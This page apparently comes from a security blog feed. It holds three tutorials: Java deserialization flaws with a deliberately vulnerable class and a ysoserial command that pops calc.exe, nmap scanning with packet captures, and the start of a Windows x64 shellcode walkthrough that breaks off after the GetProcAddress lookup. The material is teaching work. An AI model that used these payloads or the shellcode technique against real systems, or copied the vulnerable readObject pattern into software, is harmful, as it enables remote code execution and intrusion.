Normal view

There are new articles available, click to refresh the page.

Before yesterdayNytro Security

Nytro Security
Understanding Java deserializationnytrosecurity
30 May 2018 at 08:53

Understanding Java deserialization

30 May 2018 at 08:53

Some time ago I detailed PHP Object Injection vulnerabilities and this post will get into details of Java deserialization vulnerabilities. The concept is simple: developers use a feature of the programming language, serialization, to simplify their job, but they are not aware about the risks.

Java deserialization is a vulnerability similar to deserialization vulnerabilities in other programming languages. This class of vulnerabilities came to life in 2006, it become more common and more exploited and it is now part of the OWASP Top 10 2017.

What is deserialization?

In order to understand deserialization (or unserialization), we need to understand first serialization.

Each application deals with data, such as user information (e.g. username, age) and uses it to do different actions: run SQL queries, log them into files (be careful with GDPR) or just display them. Many programming languages offers the possibility to work with objects so developers can group data and methods together in classes.

Serialization is the process of translating the application data (such as objects) into a binary format that can be stored or sent over the network, in order to be reused by the same or by other application, which will deserialize it as a reverse process.

The basic idea is that it is easy to create and reuse objects.

Serialization example

Let’s take a simple example of code to see how serialization works. We will serialize a simple String object.

import java.io.*;

public class Serial
{
    public static void main(String[] args)
    {
        String name = "Nytro";
        String filename = "file.bin";

        try
        {
            FileOutputStream file  = new FileOutputStream(filename);
            ObjectOutputStream out = new ObjectOutputStream(file);

            // Serialization of the "name" (String) object
            // Will be written to "file.bin"

            out.writeObject(name);

            out.close();
            file.close();
        }
        catch(Exception e)
        {
            System.out.println("Exception: " + e.toString());
        }
    }
}

We have the following:

A String (object) “name”, which we will serialize
A file name where we will write the serialized data (we will use FileOutputStream)
We call “writeObject” method to serialize the object (using ObjectOutputStream)
We cleanup

As you can see, serialization is simple. Below is the content of the serialized data, the content of “file.bin” in hexadecimal format:

AC ED 00 05 74 00 05 4e 79 74 72 6f            ....t..Nytro

We can see the following:

Data starts with the binary “AC ED” – this is the “magic number” that identifies serialized data, so all serialized data will start with this value
Serialization protocol version “00 05”
We only have a String identified by “74”
Followed by the length of the string “00 05”
And, finally, our string

We can save this object on the file system, we can store it in a database, or we can even send it to another system over the network. To reuse it, we just need to deserialize it later, on the same system or on a different system and we should be able to fully reconstruct it. Of course, being a simple String, it’s not a big deal, but it can be any object.

Let’s see now how easy it is to deserialize it:

String name;
String filename = "file.bin";

try
{
    FileInputStream file  = new FileInputStream(filename);
    ObjectInputStream out = new ObjectInputStream(file);

    // Serialization of the "name" (String) object
    // Will be written to "file.bin"

    name = (String)out.readObject();
    System.out.println(name);

    out.close();
    file.close();
}
catch(Exception e)
{
    System.out.println("Exception: " + e.toString());
}

We need the following:

An empty string to store the reconstructed – deserialized object (name)
The file name where we can find the serialized data (using FileInputStream)
We call “readObject” to deserialize the object (using ObjectInputStream) – and convert the Object returned to String
We cleanup

By running this, we should be able to reconstruct the serialized object.

What can go wrong?

Let’s see what can happen if we want to do something useful with the serialization.

We can execute different actions as soon as the data is read from the serialized object. Let’s see a few theoretical examples of what developers might do during deserialization:

if we deserialize an “SQLConnection” object (e.g. with a ConnectionString), we can connect to the database
if we deserialize an “User” object (e.g. with a Username), we can retrieve user information form the database (by running some SQL queries)
if we deserialize a “LogFile” object (e.g. with Filename and Filecontent) we can restore the previously saved log data

In order to do something useful after deserialization, we need to implement a “readObject” method in the class we deserialize. Let’s take the “LogFile” example.

// Vulnerable class

class LogFile implements Serializable
{
   public String filename;
   public String filecontent;

  // Function called during deserialization

  private void readObject(ObjectInputStream in)
  {
     System.out.println("readObject from LogFile");

     try
     {
        // Unserialize data

        in.defaultReadObject();
        System.out.println("File name: " + filename + ", file content: \n" + filecontent);

        // Do something useful with the data
        // Restore LogFile, write file content to file name

        FileWriter file = new FileWriter(filename);
        BufferedWriter out = new BufferedWriter(file);

        System.out.println("Restoring log data to file...");
        out.write(filecontent);

        out.close();
        file.close();
     }
     catch (Exception e)
     {
         System.out.println("Exception: " + e.toString());
     }
   }
}

We can see the following:

implements Serializable – The class has to implement this interface to be serializable
filename and filecontent – Class variables, which should contain the “LogFile” data
readObject – The function that will be called during deserialization
in.defaultReadObject() – Function that performs the default deserialization -> will read the data from the file and set the values to our filename and filecontent variables
out.write(filecontent) – Our vulnerable class wants to do something useful, and it will restore the log file data (from filecontent) to a file on the disk (from filename)

So, what’s wrong here? A possible use case for this class is the following:

A user logs in and execute some actions in the application
The actions will generate a user-specific log file, using this class
The user has the possibility to download (serialize LogFile) it’s logged data
The user has the possibility to upload (deserialize LogFile) it’s previously saved data

In order to work easier with serialization, we can use the following class to serialize and deserialize data from files:

class Utils
{
    // Function to serialize an object and write it to a file

    public static void SerializeToFile(Object obj, String filename)
    {
        try
        {
            FileOutputStream file = new FileOutputStream(filename);
            ObjectOutputStream out = new ObjectOutputStream(file);

            // Serialization of the object to file

            System.out.println("Serializing " + obj.toString() + " to " + filename);
            out.writeObject(obj);

            out.close();
            file.close();
        }
        catch(Exception e)
        {
            System.out.println("Exception: " + e.toString());
        }
    }

    // Function to deserialize an object from a file

    public static Object DeserializeFromFile(String filename)
    {
        Object obj = new Object();

        try
        {
            FileInputStream file = new FileInputStream(filename);
            ObjectInputStream in = new ObjectInputStream(file);

            // Deserialization of the object to file

            System.out.println("Deserializing from " + filename);
            obj = in.readObject();

            in.close();
            file.close();
        }
        catch(Exception e)
        {
            System.out.println("Exception: " + e.toString());
        }

        return obj;
    }
}

Let’s see how a serialized object will look like. Below is the serialization of the object:

LogFile ob = new LogFile();
ob.filename = "User_Nytro.log";
ob.filecontent = "No actions logged";

String file = "Log.ser";

Utils.SerializeToFile(ob, file);

Here is the content (hex) of the Log.ser file:

AC ED 00 05 73 72 00 07 4C 6F 67 46 69 6C 65 D7 ¬í..sr..LogFile×
60 3D D7 33 3E BC D1 02 00 02 4C 00 0B 66 69 6C `=×3>¼Ñ...L..fil
65 63 6F 6E 74 65 6E 74 74 00 12 4C 6A 61 76 61 econtentt..Ljava
2F 6C 61 6E 67 2F 53 74 72 69 6E 67 3B 4C 00 08 /lang/String;L..
66 69 6C 65 6E 61 6D 65 71 00 7E 00 01 78 70 74 filenameq.~..xpt
00 11 4E 6F 20 61 63 74 69 6F 6E 73 20 6C 6F 67 ..No actions log
67 65 64 74 00 0E 55 73 65 72 5F 4E 79 74 72 6F gedt..User_Nytro
2E 6C 6F 67                                     .log

As you can see, it looks simple. We can see the class name, “LogFile”, “filename” and “filecontent” variable names and we can also see their values. However, it is important to note that there is no code, it is only the data.

Let’s dig into it to see what it contains:

AC ED -> We already discussed about the magic number
00 05 -> And protocol version
73 -> We have a new object (TC_OBJECT)
72 -> Refers to a class description (TC_CLASSDESC)
00 07 -> The length of the class name – 7 characters
4C 6F 67 46 69 6C 65 -> Class name – LogFile
D7 60 3D D7 33 3E BC D1 -> Serial version UID – An identifier of the class. This value can be specified in the class, if not, it is generated automatically
02 -> Flag mentioning that the class is serializable (SC_SERIALIZABLE) – a class can also be externalizable
00 02 -> Number of variables in the class
4C -> Type code/signature – class
00 0B -> Length of the class variable – 11
66 69 6C 65 63 6F 6E 74 65 6E 74 -> Variable name – filecontent
74 -> A string (TC_STRING)
00 12 -> Length of the class name
4C 6A 61 76 61 2F 6C 61 6E 67 2F 53 74 72 69 6E 67 3B -> Class name – Ljava/lang/String;
4C -> Type code/signature – class
00 08 -> Length of the class variable – 8
66 69 6C 65 6E 61 6D 65 -> Variable name – filename
71 -> It is a reference to a previous object (TC_REFERENCE)
00 7E 00 01 -> Object reference ID. Referenced objects start from 0x7E0000
78 -> End of block data for this object (TC_ENDBLOCKDATA)
70 -> NULL reference, we finished the “class description”, the data will follow
74 -> A string (TC_STRING)
00 11 -> Length of the string – 17 characters
4E 6F 20 61 63 74 69 6F 6E 73 20 6C 6F 67 67 65 64 -> The string – No actions logged
74 -> A string (TC_STRING)
00 0E -> Length of the string – 14 characters
55 73 65 72 5F 4E 79 74 72 6F 2E 6C 6F 67 -> The string – User_Nytro.log

The protocol details are not important, but they might help if manually updating a serialized object is required.

Attack example

As you might expect, the issue happens during the deserialization process. Below is a simple example of deserialization.

LogFile ob = new LogFile();
 String file = "Log.ser";

// Deserialization of the object 
 
 ob = (LogFile)Utils.DeserializeFromFile(file);

And here is the output:

Deserializing from Log.ser
readObject from LogFile
File name: User_Nytro.log, file content: No actions logged
Restoring log data to file...

What happens is pretty straightforward:

We deserialize the “Log.ser” file (containing a serialized LogFile object)
This will automatically call “readObject” method of “LogFile” class
It will print the file name and the file content
And it will create a file called “User_Nytro.log” containing “No actions logged” text

As you can see, an attacker will be able to write any file (depending on permissions) with any content on the system running the vulnerable application. It is not a directly exploitable Remote Command Execution, but it might be turned into one.

We need to understand a few important things:

Serialized objects do not contain code, they contain only data
The serialized object contains the class name of the serialized object
Attackers control the data, but they do not contain the code, meaning that the attack depends on what the code does with the data

Is is important to note that readObject is not the only affected method. The readResolve, readExternal and readUnshared methods have to be checked as well. Oh, we should not forget XStream. And this is not the full list…

For black-box testing, it might be easy to find serialized objects by looking into the network traffic and trying to find 0xAC 0xED bytes or “ro0” base64 encoded bytes. If we do not have any information about the libraries on the remote system, we can just iterate through all ysoserial payloads and throw them at the application.

But my readObject is safe

This might be the most common problem regarding deserialization vulnerabilities. Any application doing deserialization is vulnerable as long as in the class-path are other vulnerable classes. This happens because, as we already discussed earlier, the serialized object contains a class name. Java will try to find the class specified in the serialized object in the class path and load it.

One of the most important vulnerabilities was discovered in the well-known Apache Commons Collections library. If on the system running the deserialization application a vulnerable version of this library or multiple other vulnerable libraries is present, the deserialization vulnerability can result in remote command execution.

Let’s do an example and completely remove the “readObject” method from our LogFile class. Since it will not do anything, we should be safe, right? However, we should also download commons-collections-3.2.1.jar library and extract it in the class-path (the org directory).

In order to exploit this vulnerability, we can easily use ysoserial tool. The tool has a collection of exploits and it allows us to generate serialized objects that will execute commands during deserialization. We just need to specify the vulnerable library. Below is an example for Windows:

java -jar ysoserial-master.jar CommonsCollections5 calc.exe > Exp.ser

This will generate a serialized object (Exp.ser file) for Apache Commons Collections vulnerable library and the exploit will execute the “calc.exe” command. What happens if our code will read this file and deserialize the data?

LogFile ob = new LogFile();
 String file = "Exp.ser";

// Deserialization of the object

ob = (LogFile)Utils.DeserializeFromFile(file);

This will be the output:

Deserializing from Exp.ser
Exception in thread "main" java.lang.ClassCastException: java.management/javax.management.BadAttributeValueExpException cannot be cast to LogFile
 at LogFiles.main(LogFiles.java:105)

But this will result as well:

Calculator

We can see that an exception related to casting the deserialized object was thrown, but this happened after the deserialization process took place. So even if the application is safe, if there are vulnerable classes out there, it is game over. Oh, it is also possible to have issues with deserialization directly on JDK, without any 3rd party libraries.

How to prevent it?

The most common suggestion is to use Look Ahead ObjectInputStream. This method allows to prevent deserialization of untrusted classes by implementing a whitelist or a blacklist of classes that can be deserialized.

However, the only secure way to do serialization is to not do it.

Conclusion

Java deserialization vulnerabilities became more common and dangerous. Public exploits are available and is easy for attackers to exploit these vulnerabilities.

It might be useful to document a bit more about this vulnerability. You can find here a lot of useful resources.

We also have to consider that Oracle plans to dump Java serialization.

However, the important thing to remember is that we should just avoid (de)serialization.

Network scanning with nmap

Nytro Security

By: nytrosecurity

21 January 2019 at 06:45

Introduction

First step in the process of penetration testing is “Information gathering”, the phase where it is useful to get as much information about the target(s) as possible. While it might be different for the different type of penetration tests, such as web application or mobile application pentest, network scanning is a crucial step in the infrastructure or network pentest.

Let’s take a simple scenario: you are a penetration tester and a company want to test one of its servers. They send you the IP address of the server. How to proceed? Although nmap allows to easily specify multiple IP targets or IP classes, to keep things simple, I will use a single target IP address which I have the permission to scan (my server): 137.74.202.89.

Why?

To find vulnerabilities in a remote system, you should first find the network services running on the target server by doing a network scan and finding the open ports. A service, such as Apache or MySQL can open one or multiple ports on a server to provide its functionality, such as serving web pages or providing access to a database.

How?

A well-known tool that helps penetration testers to perform network scan is nmap (Network Mapper). Nmap is not just a port-scanner, it is a powerful tool, highly customizable that can also find the services running on a system or even use scrips (modules) to find vulnerabilities.

The easiest way to use nmap is to use the Pentest-Tools web interface which allows anyone to easily perform a network scan.

Let’s see some examples. We want to scan an IP address using nmap. How can we do it? What parameters should we use? We can start with the easiest version:

root@kali:~# nmap 137.74.202.89
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-16 02:11 EDT
Nmap scan report for rstforums.com (137.74.202.89)
Host is up (0.045s latency).
Not shown: 993 closed ports
PORT    STATE    SERVICE
22/tcp  open     ssh
25/tcp  filtered smtp
80/tcp  open     http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
443/tcp open     https
445/tcp filtered microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 2.07 seconds

We can find some useful information:

We see the nmap version and start time of the scan
We can see the domain name of the IP address: rstforums.com
We can see that host is up, so nmap checked this
We can see that 993 ports are closed
We can see that 7 ports are open or filtered

However, even if the default scan can be very useful, it might not provide all the information we need to perform the penetration test on the remote server.

Nmap options

Checking the options of nmap is the best place to start. The “nmap -h” command will show us the command line parameters grouped in multiple categories: target specification, host discovery, scan techniques, port specification, version/service detection, OS scan, script scan, performance, firewall evasion and output. It is possible to easily find detailed information about all options by using the “man nmap” command.

Let’s see what common options might be useful, from each category.

Target specification – Since we have a single IP address as a target, there is no need to load it from a file (-iL), we will specify it in the command line.
Host discovery – These options are useful when there are a lot of target IP addresses and can help to reduce the scan time by checking if the target IP addresses are online. It does this by sending multiple different packets, but it can miss some of them. Since in our case there is a single target IP address, we can disable the host discovery by using the “-Pn” argument.
Scan techniques – It is possible to scan using multiple techniques. First, it is important to know what to scan for: TCP, UDP or both. The most common services are running on TCP, but in a penetration test UDP ports must not be forgotten. It is possible to scan for UDP ports using “-sU” command line option and for TCP, there are two common scan techniques: SYN scan (“-sS” option) and Connect scan (“-sT” option).
Port specification – After we decide what scan technique to use, we have to mention the ports we want to scan. This can be easily achieved with “-p” option. By default, nmap scans the most common 1000 ports. However, to be sure, we can scan all ports (1-15535) using “-p-“ option.
Service/version detection – Even if finding open ports is a good start, finding which service and which service version are running on the target system would help more. This can be easily achieved by using the “-sV” option.
OS detection – It might be useful to also know which Operating System is running on the target system and specifying the “-O” option will instruct nmap to try to find it out.
Script scan – With the previous options we can find which services are running on the target system. However, why not to get more information about them? Nmap has a large amount of scripts that can get additional information about them. Please note that some of them might be “intrusive”, so we need the permission before scanning a target.
Performance – This category allows us to customize the speed of the scan. There are a few timing templates that can be used with “-T” parameter, from “-T0” (paranoid mode) to “-T5” (insane mode). A recommended value would be “-T3” (normal mode) and if network connectivity is good, “-T4” (aggressive mode) can be used as well.
Firewall evasion – There are multiple options which specify different techniques that can be used to avoid firewalls, however, for the simplicity we will not use them here.
Output – What happens if you scan for a long time and your system crashes? What if you close the Terminal by mistake and not check the scan result? You should always save the output of the scan result! The “-oN” saves the normal output, “-oX” saves the output as XML or “-oG” saves it in “greppable” format.
Other options – It is also very useful to know what’s happening if a long-time scan is running an “-v” can improve verbosity and keep you up to date. If there are a lot of targets, by using “–open” you will only get the open ports as output and it can improve your scan read time. It is possible to also resume a scanning session (if output was saved) using “–resume” option and “-A” (aggressive) can turn on multiple scan options by default: “-O -sC -sV” but not “-T4”.

During a penetration test all ports must be scanned. A possible nmap command to do it would be the following:

nmap -sS -sU -p- -sC -sV -O -Pn -v -oN output 137.74.202.89

However, it will take some time, so a good suggestion is to run a shorter scan first, scan for example only most common 100 or 1000 TCP ports and after this scan is finished, start the full scan while working with the result of this scan. Below is an example, where “–top-ports” option choses the most common 1000 ports.

nmap -sS --top-ports 1000 -sC -sV -v -Pn -oN output 137.74.202.89

TCP vs UDP scan

While doing a network scan, it is useful to understand the differences between TCP and UDP protocols.

UDP protocol is very simple, but it does not offer the functionalities that TCP offers. The most useful features of TCP are the following:

It requires an initial connection, in 3 steps, also called “3-way handshake”:

Client sends a packet with the SYN flag (a bit in the TCP header) set
Server replies with the SYN and ACK flags set (as mentioned in the TCP standard, this can also be done in two packets, but it’s easier to combine them in a single packet)
Client confirms using an ACK flag set packet.

Each packet sent to a target is confirmed by another packet, so it is possible to know if the packed reached the destination or not
Each packet has a number, so it is sure that the packets are processed at the destination in the same order as they were sent

The initial connection is important to be understood in order to understand the difference between the two common TCP scans: SYN scan (-sS) vs Connect (-sT) scan. The difference is that the SYN scan is faster, as nmap will not send the last ACK packet. Also, it is important to note that nmap requires root privileges to use SYN scan. This is because nmap need to use RAW sockets, a functionality of the Operating system, to be able to manually create the TCP packets and this needs root privileges. If we run nmap with root privileges, by default it will use SYN scan, if not, It will use Connect scan.

How does it work?

Enough with the theory, let’s see what happens during a SYN and UDP scan. We will use a simple command, to scan for port 80 on both TCP (using SYN scan) and UDP.

# nmap -sS -sU -Pn -p 80 137.74.202.89
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-17 13:12 EDT
Nmap scan report for rstforums.com (137.74.202.89)
Host is up (0.045s latency).
PORT   STATE  SERVICE
80/tcp open   http
80/udp closed http
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds

During the scan, we open Wireshark and check for the packets sent using a filter that will show us only the packets sent to our target IP address: “ip.addr == 137.74.202.89”. Below is the result:

We can see the following:

First three packets are TCP: one with the SYN flag sent by nmap, one with the SYN and ACK flags sent by the target server and one with RST (Reset) flag sent by nmap. As you can see, being a SYN scan, the last packet of the three-way handshake does not exist. This is helpful, because some services, on connection, might log the IP address that connected to them and this type of scan helps us to avoid this issue.
Last two packets are UDP and ICMP: first packet is the one sent by nmap to the remote port 80, and it received an ICMP message “Destination unreachable (Port unreachable)” which informs us that the port is not open and nmap can show it as closed. However, please note that those packets might not be sent.

Let’s also check for a Connect scan is performed. We can use the following command:

nmap -sT -Pn -p 80 137.74.202.89

Below is the result:

We can see that there are four packets:

First three packets represent the three-way handshake used to initiate the connection.
Last packet is sent to close the connection

What happens if the port is closed? We will change the port to a random one: 1337

There are two packets:

First packet is the SYN packet sent by nmap to initiate the connection
Second packet is the RST packet received, meaning that the port is not opened

However, if a firewall is used, it might be possible to not receive the RST packet.

Service version

Service version option (-sV) allows us to find out what is running on the target port. This depends on the service running there. However, let’s see some examples of requests that nmap will use to find what is running on port 80, which is an Apache web server.

# nmap -sS -Pn -p 80 -sV 137.74.202.89
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-17 14:05 EDT
Nmap scan report for rstforums.com (137.74.202.89)
Host is up (0.043s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.98 seconds

Below is a list of HTTP requests sent by nmap:

GET / HTTP/1.0

GET /nmaplowercheck1539799522 HTTP/1.1
Host: rstforums.com
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)

POST /sdk HTTP/1.1
Host: rstforums.com
Content-Length: 441
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)

<soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>

GET /HNAP1 HTTP/1.1
Host: rstforums.com
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)

GET / HTTP/1.1
Host: rstforums.com

GET /evox/about HTTP/1.1
Host: rstforums.com
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)

Script scan

If we enable the script scan (-sC), the number of requests increases as it will use multiple “scripts” to find more information about the target. Let’s take the following example:

# nmap -sS -Pn -p 80 -sC 137.74.202.89
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-17 14:14 EDT
Nmap scan report for rstforums.com (137.74.202.89)
Host is up (0.045s latency).
PORT   STATE SERVICE
80/tcp open  http
|_http-title: Did not follow redirect to https://rstforums.com/
Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds

Below is the Wireshark output, using a filter that matches only the HTTP requests sent:

As you can see, nmap scripts will send several HTTP requests useful to find more information about the application running on the web server. For example, it will send a request to find if “.git” directory is present, which can contain source code, it sends a request to get “robots.txt” file which might lead to additional paths and one script even sends a POST request to find if there is a RPC (Remote Procedure Call) aware service running:

POST / HTTP/1.1
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
Host: rstforums.com

<methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall>

Conclusion

Nmap is most often seen as a “port scanner”. However, in the right hands, in the hands of someone that properly understands how it works, it turns into a powerful penetration testing tool.

This article highlights some of the most common and useful features of nmap, but for a comprehensive understanding of the tool it is required to read the manual and actually use it.

Nytro Security
Writing shellcodes for Windows x64nytrosecurity
30 June 2019 at 16:01

Writing shellcodes for Windows x64

Nytro Security

By: nytrosecurity

30 June 2019 at 16:01

Long time ago I wrote three detailed blog posts about how to write shellcodes for Windows (x86 – 32 bits). The articles are beginner friendly and contain a lot of details. First part explains what is a shellcode and which are its limitations, second part explains PEB (Process Environment Block), PE (Portable Executable) file format and the basics of ASM (Assembler) and the third part shows how a Windows shellcode can be actually implemented.

This blog post is the port of the previous articles on Windows 64 bits (x64) and it will not cover all the details explained in the previous blog posts, so who is not familiar with all the concepts of shellcode development on Windows must see them before going further.

Of course, the differences between x86 and x64 shellcode development on Windows, including ASM, will be covered here. However, since I already write some details about Windows 64 bits on the Stack Based Buffer Overflows on x64 (Windows) blog post, I will just copy and paste them here.

As in the previous blog posts, we will create a simple shellcode that swaps the mouse buttons using SwapMouseButton function exported by user32.dll and grecefully close the proccess using ExitProcess function exported by kernel32.dll.

ASM for x64

There are multiple differences in Assembly that need to be understood in order to proceed. Here we will talk about the most important changes between x86 and x64 related to what we are going to do.

Please note that this article is for educational purposes only. It has to be simple, meaning that, of course, there are a lot of optimizations that can be done for the resulted shellcode to be smaller and faster.

First of all, the registers are now the following:

The general purpose registers are the following: RAX, RBX, RCX, RDX, RSI, RDI, RBP and RSP. They are now 64 bit (8 bytes) instead of 32 bits (4 bytes).
The EAX, EBX, ECX, EDX, ESI, EDI, EBP, ESP represent the last 4 bytes of the previously mentioned registers. They hold 32 bits of data.
There are a few new registers: R8, R9, R10, R11, R12, R13, R14, R15, also holding 64 bits.
It is possible to use R8d, R9d etc. in order to access the last 4 bytes, as you can do it with EAX, EBX etc.
Pushing and poping data on the stack will use 64 bits instead of 32 bits

Calling convention

Another important difference is the way functions are called, the calling convention.

Here are the most important things we need to know:

First 4 parameters are not placed on the stack. First 4 parameters are specified in the RCX, RDX, R8 and R9 registers.
If there are more than 4 parameters, the other parameters are placed on the stack, from left to right.
Similar to x86, the return value will be available in the RAX register.
The function caller will allocate stack space for the arguments used in registers (called “shadow space” or “home space”). Even if when a function is called the parameters are placed in registers, if the called function needs to modify the registers, it will need some space to store them, and this space will be the stack. The function caller will have to allocate this space before the function call and to deallocate it after the function call. The function caller should allocate at least 32 bytes (for the 4 registers), even if they are not all used.
The stack has to be 16 bytes aligned before any call instruction. Some functions might allocate 40 (0x28) bytes on the stack (32 bytes for the 4 registers and 8 bytes to align the stack from previous usage – the return RIP address pushed on the stack) for this purpose. You can find more details here.
Some registers are volatile and other are nonvolatile. This means that if we set some values into a register and call some function (e.g. Windows API) the volatile register will probably change while nonvolatile register will preserve their values.

More details about calling convention on Windows can be found here.

Function calling example

Let’s take a simple example in order to understand those things. Below is a function that does a simple addition, and it is called from main.

#include "stdafx.h"

int Add(long x, int y)
{
    int z = x + y;
    return z;
}

int main()
{
    Add(3, 4);
    return 0;
}

Here is a possible output, after removing all optimizations and security features.

Main function:

sub rsp,28
mov edx,4
mov ecx,3
call <consolex64.Add>
xor eax,eax
add rsp,28
ret

We can see the following:

sub rsp,28 – This will allocate 0x28 (40) bytes on the stack, as we discussed: 32 bytes for the register arguments and 8 bytes for alignment.
mov edx,4 – This will place in EDX register the second parameter. Since the number is small, there is no need to use RDX, the result is the same.
mov ecx,3 – The value of the first argument is place in ECX register.
call <consolex64.Add> – Call the “Add” function.
xor eax,eax – Set EAX (or RAX) to 0, as it will be the return value of main.
add rsp,28 – Clears the allocated stack space.
ret – Return from main.

Add function:

mov dword ptr ss:[rsp+10],edx
mov dword ptr ss:[rsp+8],ecx
sub rsp,18
mov eax,dword ptr ss:[rsp+28]
mov ecx,dword ptr ss:[rsp+20]
add ecx,eax
mov eax,ecx
mov dword ptr ss:[rsp],eax
mov eax,dword ptr ss:[rsp]
add rsp,18
ret

Let’s see how this function works:

mov dword ptr ss:[rsp+10],edx – As we know, the arguments are passed in ECX and EDX registers. But what if the function needs to use those registers (however, please note that some registers must be preserved by a function call, these registers are the following: RBX, RBP, RDI, RSI, R12, R13, R14 and R15)? In this case, the function will use the “shadow space” (“home space”) allocated by the function caller. With this instruction, the function saves on the shadow space the second argument (the value 4), from EDX register.
mov dword ptr ss:[rsp+8],ecx – Similar to the previous instruction, this one will save on the stack the first argument (value 3) from the ECX register
sub rsp,18 – Allocate 0x18 (or 24) bytes on the stack. This function does not call other function, so it is not needed to allocate at least 32 bytes. Also, since it does not call other functions, it is not required to align the stack to 16 bytes. I am not sure why it allocates 24 bytes, it looks like the “local variables area” on the stack has to be aligned to 16 bytes and the other 8 bytes might be used for the stack alignment (as previously mentioned).
mov eax,dword ptr ss:[rsp+28] – Will place in EAX register the value of the second parameter (value 4).
mov ecx,dword ptr ss:[rsp+20] – Will place in ECX register the value of the first parameter (value 3).
add ecx,eax – Will add to ECX the value of the EAX register, so ECX will become 7.
mov eax,ecx – Will save the same value (the sum) into EAX register.
mov dword ptr ss:[rsp],eax and mov eax,dword ptr ss:[rsp] look like they are some effects of the removed optimizations, they don’t do anything useful.
add rsp,18 – Cleanup the allocated stack space.
ret – Return from the function

Writing ASM on Windows x64

There are multiple ways to write assembler on Windows x64. I will use NASM and the linker provided by Microsoft Visual Studio Community.

I will use the x64.asm file to write the assembler code, the NASM will output x64.obj and the linker will create x64.exe. To keep this process simple, I created a simple Windows Batch script:

del x64.obj
del x64.exe
nasm -f win64 x64.asm -o x64.obj
link /ENTRY:main /MACHINE:X64 /NODEFAULTLIB /SUBSYSTEM:CONSOLE x64.obj

You can run it using “x64 Native Tools Command Prompt for VS 2019” where “link” is available directly. Just not forget to add NASM binaries directory to the PATH environment variable.

To test the shellcode I open the resulted binary in x64bdg and go through the code step by step. This way, we can be sure everything is OK.

Before starting with the actual shellcode, we can start with the following:

BITS 64
SECTION .text
global main
main:

sub   RSP, 0x28                 ; 40 bytes of shadow space
and   RSP, 0FFFFFFFFFFFFFFF0h   ; Align the stack to a multiple of 16 bytes

This will specify a 64 bit code, with a “main” function in the “.text” (code) section. The code will also allocate some stack space and align the stack to a multiple of 16 bytes.

Find kernel32.dll base address

As we know, the first step in the shellcode development process for Windows is to find the base address of kernel32.dll, the memory address where it is loaded. This will help us to find its useful exported functions: GetProcAddress and LoadLibraryA which we can use to achive our goals.

We will start finding the TEB (Thread Environment Block), the structure that contains thread information in usermode and we can find it using GS register, ar gs:[0x00]. This structure also contains a pointer to the PEB (Process Envrionment Block) at offset 0x60.

The PEB contains the “Loader” (Ldr) at offset 0x18 which contains the “InMemoryOrder” list of modules at offset 0x20. As we did for x86, first module will be the executable, the second one ntdll.dll and the third one kernel32.dll which we want to find. This means we will go through a linked list (LIST_ENTRY structure which contains to LIST_ENTRY* pointers, Flink and Blink, 8 bytes each on x64).

After we find the third module, kernel32.dll, we just need to go to offset 0x20 to get its base address and we can start doing our stuff.

Below is how we can get the base address of kernel32.dll using PEB and store it in the RBX register:

; Parse PEB and find kernel32

xor rcx, rcx             ; RCX = 0
mov rax, [gs:rcx + 0x60] ; RAX = PEB
mov rax, [rax + 0x18]    ; RAX = PEB->Ldr
mov rsi, [rax + 0x20]    ; RSI = PEB->Ldr.InMemOrder
lodsq                    ; RAX = Second module
xchg rax, rsi            ; RAX = RSI, RSI = RAX
lodsq                    ; RAX = Third(kernel32)
mov rbx, [rax + 0x20]    ; RBX = Base address

Find the address of GetProcAddress function

It is really similar to find the address of GetProcAddress function, the only difference would be the offset of export table which is 0x88 instead of 0x78.

The steps are the same:

Go to the PE header (offset 0x3c)
Go to Export table (offset 0x88)
Go to the names table (offset 0x20)
Get the function name
Check if it starts with “GetProcA”
Go to the ordinals table (offset 0x24)
Get function number
Go to the address table (offset 0x1c)
Get the function address

Below is the code that can help us find the address of GetProcAddress:

; Parse kernel32 PE

xor r8, r8                 ; Clear r8
mov r8d, [rbx + 0x3c]      ; R8D = DOS->e_lfanew offset
mov rdx, r8                ; RDX = DOS->e_lfanew
add rdx, rbx               ; RDX = PE Header
mov r8d, [rdx + 0x88]      ; R8D = Offset export table
add r8, rbx                ; R8 = Export table
xor rsi, rsi               ; Clear RSI
mov esi, [r8 + 0x20]       ; RSI = Offset namestable
add rsi, rbx               ; RSI = Names table
xor rcx, rcx               ; RCX = 0
mov r9, 0x41636f7250746547 ; GetProcA

; Loop through exported functions and find GetProcAddress

Get_Function:

inc rcx                    ; Increment the ordinal
xor rax, rax               ; RAX = 0
mov eax, [rsi + rcx * 4]   ; Get name offset
add rax, rbx               ; Get function name
cmp QWORD [rax], r9        ; GetProcA ?
jnz Get_Function
xor rsi, rsi               ; RSI = 0
mov esi, [r8 + 0x24]       ; ESI = Offset ordinals
add rsi, rbx               ; RSI = Ordinals table
mov cx, [rsi + rcx * 2]    ; Number of function
xor rsi, rsi               ; RSI = 0
mov esi, [r8 + 0x1c]       ; Offset address table
add rsi, rbx               ; ESI = Address table
